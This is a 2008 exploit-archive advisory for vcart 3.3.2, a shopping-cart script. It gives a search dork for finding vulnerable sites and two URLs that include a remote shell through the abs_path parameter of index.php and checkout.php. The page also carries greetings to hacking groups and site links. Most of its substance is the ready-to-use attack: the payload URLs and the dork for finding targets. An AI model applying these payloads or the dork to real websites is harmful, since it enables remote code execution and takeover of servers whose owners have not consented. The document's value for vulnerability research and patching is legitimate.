vcart 3.3.2 Multiple Remote File Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : vcart 3.3.2 Multiple Remote File Inclusion Vulnerabilities
# Published : 2008-01-11
# Author : k1n9k0ng
# Previous Title : DomPHP 0.81 (index.php cat) Remote SQL Injection Vulnerability
# Next Title : AJchat 0.10 unset() bug Remote SQL Injection Vulnerability

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : vcart version 3.3.2
Discovered By   : k1n9k0ng
Scripts site    : http://www.visionburst.com/
Thanks To       : #sekuritionline, #semprol, #bajingan, #mimid, #r.i.p, #x-code, #yogyafree
special To      : adhietslank, sukam, cyberlog, cah_gemblunkz, the_sims, aRiee, letjen, k1tk4t
site            : www.sekuritionline.net
dork        : Powered by "vcart 3.3.2"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug found:
"http://www.site.net/index.php?abs_path=[shell]"
"http://www.site.net/checkout.php?abs_path=[shell]"

# www.Syue.com [2008-01-11]